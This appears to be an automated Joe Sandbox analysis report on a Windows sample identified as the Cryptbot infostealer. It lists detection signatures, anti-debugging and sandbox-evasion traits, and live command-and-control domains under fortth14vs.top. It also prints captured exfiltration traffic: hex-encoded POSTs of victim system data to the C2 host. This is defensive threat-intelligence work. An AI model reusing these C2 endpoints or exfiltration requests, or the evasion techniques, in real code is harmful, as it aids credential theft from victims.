Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random(5).exe

Overview

General Information

Sample name:random(5).exe
Analysis ID:1583231
MD5:f200a3445a8034d201eeb79bb29e1d73
SHA1:473cd32eb4bc8ff05c3e608b86ba651fc4d7b0e1
SHA256:ee6c112a14a1e5a9429b47f5b810f61a58e77860eea867e064d2ab40582757cc
Tags:exelev-tolstoi-comuser-JAMESWT_MHT
Infos:

Detection

Cryptbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • random(5).exe (PID: 5792 cmdline: "C:\Users\user\Desktop\random(5).exe" MD5: F200A3445A8034D201EEB79BB29E1D73)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["KvgPhome.fortth14vs.top", ".for8014vs.top", "home.fortth14vs.top", ".1.1home.fortth14vs.top", ".forth14vs.top", "fortth14vsh14vs.top"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: random(5).exe PID: 5792JoeSecurity_Cryptbot_1Yara detected CryptbotJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: random(5).exeAvira: detected
    Antivirus detection for URL or domain
    Source: KvgPhome.fortth14vs.topAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZ0Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0UAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963Avira URL Cloud: Label: malware
    Source: .1.1home.fortth14vs.topAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0Avira URL Cloud: Label: malware
    Source: home.fortth14vs.topAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZTAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lseAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738Avira URL Cloud: Label: malware
    Found malware configuration
    Source: random(5).exe.5792.0.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["KvgPhome.fortth14vs.top", ".for8014vs.top", "home.fortth14vs.top", ".1.1home.fortth14vs.top", ".forth14vs.top", "fortth14vsh14vs.top"]}
    Multi AV Scanner detection for submitted file
    Source: random(5).exeVirustotal: Detection: 48%Perma Link
    Source: random(5).exeReversingLabs: Detection: 44%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: random(5).exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\random(5).exeCode function: -----BEGIN PUBLIC KEY-----0_2_00E5DCF0
    Source: random(5).exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00E9A5B0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00E9B560
    Source: random(5).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E3255D
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E329FF

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: KvgPhome.fortth14vs.top
    Source: Malware configuration extractorURLs: .for8014vs.top
    Source: Malware configuration extractorURLs: home.fortth14vs.top
    Source: Malware configuration extractorURLs: .1.1home.fortth14vs.top
    Source: Malware configuration extractorURLs: .forth14vs.top
    Source: Malware configuration extractorURLs: fortth14vsh14vs.top
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
    Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
    Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox ViewIP Address: 34.147.147.173 34.147.147.173
    Source: Joe Sandbox ViewIP Address: 34.200.57.114 34.200.57.114
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EFA8C0 recvfrom,0_2_00EFA8C0
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
    Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:13 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:14 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
    Source: random(5).exe, random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
    Source: random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ0
    Source: random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZT
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
    Source: random(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: random(5).exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
    Source: random(5).exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: random(5).exe, random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: random(5).exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710

    System Summary

    barindex
    PE file contains section with special chars
    Source: random(5).exeStatic PE information: section name:
    Source: random(5).exeStatic PE information: section name: .idata
    Source: random(5).exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_0085B9E50_3_0085B9E5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_008615740_3_00861574
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E405B00_2_00E405B0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E46FA00_2_00E46FA0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EFB1800_2_00EFB180
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E6F1000_2_00E6F100
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00F000E00_2_00F000E0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011BA0000_2_011BA000
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011BE0500_2_011BE050
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E962100_2_00E96210
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EFC3200_2_00EFC320
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00F004200_2_00F00420
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011844100_2_01184410
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011967300_2_01196730
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011B47800_2_011B4780
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3E6200_2_00E3E620
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E9A7F00_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EFC7700_2_00EFC770
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3A9600_2_00E3A960
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E449400_2_00E44940
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EEC9000_2_00EEC900
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_010EAB2C0_2_010EAB2C
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011A8BF00_2_011A8BF0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3CBB00_2_00E3CBB0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00FC4B600_2_00FC4B60
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_01006AC00_2_01006AC0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_010EAAC00_2_010EAAC0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011B4D400_2_011B4D40
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011ACD800_2_011ACD80
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011BCC900_2_011BCC90
